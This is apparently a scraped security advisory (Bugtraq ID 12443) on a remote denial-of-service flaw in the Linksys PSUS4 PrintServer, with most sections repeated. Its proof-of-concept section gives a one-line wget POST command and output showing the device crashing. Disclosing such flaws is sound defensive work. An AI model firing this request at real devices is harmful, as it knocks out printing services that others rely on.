Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
BID:12443
Info
Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
| Bugtraq ID: | 12443 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 03 2005 12:00AM |
| Updated: | Feb 03 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to laurent oudot <[email protected]>. |
| Vulnerable: |
Linksys PSUS4 PrintServer 6032 |
| Not Vulnerable: | |
Discussion
Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
Linksys PSUS4 PrintServer is reported prone to a remote denial of service vulnerability while handling certain HTTP POST requests received on TCP port 80.
An attacker may exploit this condition to deny service to the affected PrintServer.
Linksys PSUS4 PrintServer is reported prone to a remote denial of service vulnerability while handling certain HTTP POST requests received on TCP port 80.
An attacker may exploit this condition to deny service to the affected PrintServer.
Exploit / POC
Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
The following example is available:
$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05-- http://192.168.1.2/
=> `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...
=> And the PSUS4 is crashed.
The following example is available:
$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05-- http://192.168.1.2/
=> `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...
=> And the PSUS4 is crashed.
Solution / Fix
Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial Of Service
References:
References:
- PSUS4 PrintServer Homepage (Linksys)
- [RSTACK Public Security Advisory] Remote DOS against Linksys PSUS4 (laurent oudot